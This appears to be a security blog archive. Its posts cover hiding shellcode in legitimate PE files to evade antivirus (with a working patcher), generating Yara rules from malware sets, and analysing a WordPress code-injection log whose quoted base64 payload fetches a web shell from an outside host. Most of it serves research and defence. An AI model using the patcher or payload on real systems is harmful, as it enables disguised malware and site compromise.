Unintended Results: Or maybe not

6 May 2012

Embedding a shellcode in a PE file

Some time ago a friend asked on a private mailing list about ways to embed a shellcode in an executable (PE) file while bypassing AV detection. I recommended taking any Windows-supplied PE file (or any other 'goodware' PE file) and patching some function that is always called with the shellcode. It turned out to be one of many possible AV evasion techniques that seem to work in many cases. The only problem was that no tool existed to do this, so I decided to write one (based on Pyew) for the task.
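The mechanics behind that approach, as an added example that is not the author's Pyew-based tool: locate the file bytes that back a relative virtual address inside the PE, check that the target lives in an executable section, and overwrite them. The toy PE builder, the target RVA and the shellcode placeholder are constructed sample data; choosing a function the program always calls, and keeping the host program working afterwards, is left to the analyst.

```python
"""Patch code at a chosen RVA inside a PE file using only the standard library.
Added example for the technique described above; not the author's Pyew tool."""
import struct

IMAGE_SCN_MEM_EXECUTE = 0x20000000


def parse_sections(pe: bytes) -> list:
    """Walk the DOS, COFF and section headers; return one dict per section."""
    if pe[:2] != b"MZ":
        raise ValueError("not an MZ file")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("bad PE signature")
    coff = e_lfanew + 4
    # COFF header: NumberOfSections at +2, SizeOfOptionalHeader at +16
    nsections, size_opt = struct.unpack_from("<H12xH", pe, coff + 2)
    sections = []
    off = coff + 20 + size_opt  # section table follows the optional header
    for _ in range(nsections):
        name, vsize, va, rsize, rptr, _, _, _, _, flags = struct.unpack_from(
            "<8sIIIIIIHHI", pe, off)
        sections.append({"name": name.rstrip(b"\0").decode("ascii", "replace"),
                         "va": va, "vsize": vsize, "raw_ptr": rptr,
                         "raw_size": rsize, "flags": flags})
        off += 40
    return sections


def rva_to_offset(pe: bytes, rva: int):
    """Return (file_offset, section) for an RVA, or None if no file bytes back it."""
    for sec in parse_sections(pe):
        span = max(sec["vsize"], sec["raw_size"])
        if sec["va"] <= rva < sec["va"] + span:
            delta = rva - sec["va"]
            if delta >= sec["raw_size"]:
                return None  # exists only as zero-filled memory past the raw data
            return sec["raw_ptr"] + delta, sec
    return None


def patch_function(pe: bytes, rva: int, shellcode: bytes) -> bytes:
    """Return a copy of pe with shellcode written over the bytes at rva.
    Refuses non-executable targets and writes that would run off the section."""
    hit = rva_to_offset(pe, rva)
    if hit is None:
        raise ValueError(f"RVA {rva:#x} is not backed by file data")
    off, sec = hit
    if not sec["flags"] & IMAGE_SCN_MEM_EXECUTE:
        raise ValueError(f"RVA {rva:#x} is in non-executable section {sec['name']}")
    if off + len(shellcode) > sec["raw_ptr"] + sec["raw_size"]:
        raise ValueError("shellcode does not fit in the section's raw data")
    return pe[:off] + shellcode + pe[off + len(shellcode):]


def build_toy_pe() -> bytes:
    """Constructed PE32 image with one executable .text section at RVA 0x1000.
    Headers are filled only as far as the parser needs; sample input, not a
    loadable program."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)                         # e_lfanew -> 0x40
    coff = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 0xE0, 0x102)  # i386, 1 section
    opt = bytearray(0xE0)
    struct.pack_into("<H", opt, 0, 0x10B)                           # PE32 magic
    struct.pack_into("<I", opt, 16, 0x1000)                         # AddressOfEntryPoint
    struct.pack_into("<I", opt, 28, 0x400000)                       # ImageBase
    text_flags = 0x20 | IMAGE_SCN_MEM_EXECUTE | 0x40000000          # CODE | EXECUTE | READ
    sec = struct.pack("<8sIIIIIIHHI", b".text", 0x200, 0x1000, 0x200, 0x200,
                      0, 0, 0, 0, text_flags)
    image = (bytes(dos) + b"PE\0\0" + coff + bytes(opt) + sec).ljust(0x200, b"\0")
    text = (b"\x90" * 16 + b"\xC3").ljust(0x200, b"\xCC")           # nop sled, ret, int3 fill
    return image + text


if __name__ == "__main__":
    pe = build_toy_pe()
    SHELLCODE = b"\xCC" * 8  # placeholder bytes; a real payload goes here
    off, sec = rva_to_offset(pe, 0x1000)
    patched = patch_function(pe, 0x1000, SHELLCODE)
    print(f"wrote {len(SHELLCODE)} bytes at RVA 0x1000 -> offset {off:#x} in {sec['name']}")
```

The two checks in patch_function are the ones that usually bite in practice: an RVA inside the section's virtual size but past its raw data has no file bytes to patch, and a payload longer than the space left in the section silently corrupts whatever follows it.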

29 April 2012

Extracting binary patterns in malware sets and generating Yara rules

Some time ago a friend and I were talking about how to build a tool that compares a set of malware samples and extracts the binary patterns matched in all or most of them. While searching for diffing algorithms I found some very interesting papers on the matter, such as "An O(ND) Difference Algorithm and Its Variations", and several diffing libraries like Google Diff Match Patch. In the end I wrote a test tool on top of this library and ended up with an automatic Yara signature generator.
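An added example of the core idea (not the author's tool, which was built on a diff library): intersect the byte n-grams of all samples, merge the survivors into maximal runs, drop padding-like runs, and emit what is left as a Yara rule. The sample buffers are constructed, and the n-gram intersection stands in for the O(ND) diff mentioned above.

```python
"""Extract byte patterns shared by every sample in a set and wrap them in a
Yara rule. Added example; uses n-gram intersection rather than a diff library."""


def common_ngrams(samples, n=8):
    """Return the set of n-byte substrings that occur in every sample."""
    if not samples:
        return set()
    grams = {samples[0][i:i + n] for i in range(len(samples[0]) - n + 1)}
    for s in samples[1:]:
        grams &= {s[i:i + n] for i in range(len(s) - n + 1)}
    return grams


def merge_runs(sample, grams, n):
    """Walk one sample and merge overlapping shared n-grams into maximal runs."""
    runs, i, end = [], 0, len(sample) - n
    while i <= end:
        if sample[i:i + n] in grams:
            start = i
            while i <= end and sample[i:i + n] in grams:
                i += 1
            runs.append(sample[start:i - 1 + n])
        else:
            i += 1
    return runs


def common_patterns(samples, n=8, min_distinct=3):
    """Patterns present in all samples, longest first. A run merged in the first
    sample that is not contiguous in the others falls back to its n-grams, and
    runs with fewer than min_distinct byte values (zero or 0xCC fill) are dropped."""
    grams = common_ngrams(samples, n)
    found = set()
    for run in merge_runs(samples[0], grams, n):
        if len(set(run)) < min_distinct:
            continue
        if all(run in s for s in samples):
            found.add(run)
        else:
            found.update(g for g in (run[i:i + n] for i in range(len(run) - n + 1))
                         if len(set(g)) >= min_distinct)
    return sorted(found, key=lambda p: (-len(p), p))


def yara_rule(name, samples, n=8, max_strings=20):
    """Render a Yara rule whose strings are the shared patterns in hex form."""
    patterns = common_patterns(samples, n)[:max_strings]
    if not patterns:
        raise ValueError("no shared pattern long enough to sign on")
    lines = [f"rule {name}", "{", "    meta:",
             f'        description = "auto-generated from {len(samples)} samples"',
             "    strings:"]
    for idx, pat in enumerate(patterns):
        lines.append(f"        $s{idx} = {{ {pat.hex(' ').upper()} }}")
    lines += ["    condition:", "        all of them", "}"]
    return "\n".join(lines)


# Constructed samples: a shared x86 prologue-like fragment surrounded by
# sample-specific bytes. Not real malware.
SHARED = b"\x55\x8b\xec\x83\xec\x10\x53\x56\x57\x8b\x7d\x08"
SAMPLES = [
    b"\x00" * 5 + SHARED + b"\x11\x22\x33",
    b"abc" + SHARED + b"\x90" * 4,
    SHARED + b"zzzz" + b"\x00" * 8,
]

if __name__ == "__main__":
    print(yara_rule("shared_prologue", SAMPLES))
```

The min_distinct filter matters more than it looks: without it, runs of zero padding or section fill are common to almost every PE and would make the rule match nearly anything.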

4 December 2011

Automated or manual attack?

Today I received a notification about an automated attack against this blog. Nothing new, but I was curious about how exactly it works and decided to take a brief look at the attack to answer a few questions:

  • What vulnerability is this exploiting? Am I vulnerable?
  • What does the payload do?
  • Is this an automated attack or a manually launched one?

The attack in the logs

Since I installed the Mute Screamer plugin for WordPress I regularly receive attack alerts (mostly about spamming). The one I received today was a bit different. The following line appears in the generated log file:

/blog/engine.php?action=log-reset&type=ih_options();eval(base64_decode(cGFzc3RocnUoJ3dnZXQgaHR0cDovL3d3dy5zY2sub2JlY3ZyYm92LnNrL3dwLWNvbnRlbnQvdXBsb2Fkcy9mZ2FsbGVyeS9zaC50eHQ7IG12IHNoLnR4dCBsb2cucGhwJyk7));

So, this is an exploit for a PHP code injection vulnerability in "engine.php". A quick search for the vulnerability turned up this: WordPress is_human() Plugin Remote Command Injection Vulnerability. Fortunately, I don't have this plugin installed, so the first two questions are already answered. Time to answer the next one: what does the payload do?
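As an added example (not the post's own analysis), the request line quoted above can be unpacked mechanically: find the base64_decode(...) argument inside the eval wrapper, decode it, peel any nested layers, and pull out the PHP execution functions and URLs the payload uses. The embedded log line is the one shown above; the regexes and the indicator list are my assumptions.

```python
"""Unpack eval(base64_decode(...)) payloads from a logged request line.
Added example; the log line is the one quoted in the post, the rest is mine."""
import base64
import re
import urllib.parse

# The request line as it appeared in the post's log file.
LOG_LINE = ("/blog/engine.php?action=log-reset&type=ih_options();eval(base64_decode("
            "cGFzc3RocnUoJ3dnZXQgaHR0cDovL3d3dy5zY2sub2JlY3ZyYm92LnNrL3dwLWNvbnRlbnQvdXBsb2Fkcy9mZ2FsbGVyeS9zaC50eHQ7IG12IHNoLnR4dCBsb2cucGhwJyk7));")

B64_CALL = re.compile(r"base64_decode\(\s*['\"]?([A-Za-z0-9+/=]+)['\"]?\s*\)")
EXEC_FUNCS = ("passthru", "system", "exec", "shell_exec", "popen", "proc_open")
URL_RE = re.compile(r"https?://[^\s'\";)]+")


def _b64(blob: str):
    """Decode one base64 blob, tolerating stripped padding; None if it is not base64."""
    blob += "=" * (-len(blob) % 4)
    try:
        return base64.b64decode(blob, validate=True).decode("utf-8", "replace")
    except ValueError:  # binascii.Error is a ValueError subclass
        return None


def decode_payloads(line: str, max_depth: int = 5) -> list:
    """Decode every base64_decode(...) argument in a request line, peeling
    nested eval(base64_decode(...)) layers up to max_depth."""
    # unquote, not unquote_plus: '+' is a base64 digit and must survive
    line = urllib.parse.unquote(line)
    results = []
    for m in B64_CALL.finditer(line):
        text, depth = _b64(m.group(1)), 1
        while text is not None and depth < max_depth:
            inner = B64_CALL.search(text)
            if inner is None:
                break
            text, depth = _b64(inner.group(1)), depth + 1
        if text is not None:
            results.append(text)
    return results


def analyse(line: str) -> dict:
    """Summarise decoded payloads: PHP execution functions called and URLs fetched."""
    payloads = decode_payloads(line)
    funcs = {f for p in payloads for f in EXEC_FUNCS if re.search(rf"\b{f}\s*\(", p)}
    urls = {u for p in payloads for u in URL_RE.findall(p)}
    return {"payloads": payloads, "exec_funcs": sorted(funcs), "urls": sorted(urls)}


if __name__ == "__main__":
    for key, value in analyse(LOG_LINE).items():
        print(f"{key}: {value}")
```

Running this over a web server's access log (one call to analyse per request line) gives a quick triage of which hosts the injected code pulls its second stage from, which is usually the most useful indicator to block or hunt for.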

22 October 2010

Zerowine 2.0 preview

Hi!

I plan to release the newest version of ZeroWine, focused on automation, in a month or so. This new version consists of the following components:

  • A modified version of Wine 1.10.
  • One XMLRPC Server.
  • One XMLRPC client tool.

14 May 2010

Dangers of Oracle Virtual Columns

Virtual Columns are a feature introduced in Oracle 11g. They allow table columns to be defined by expressions, including calls to PL/SQL functions. While useful, this can be dangerous too.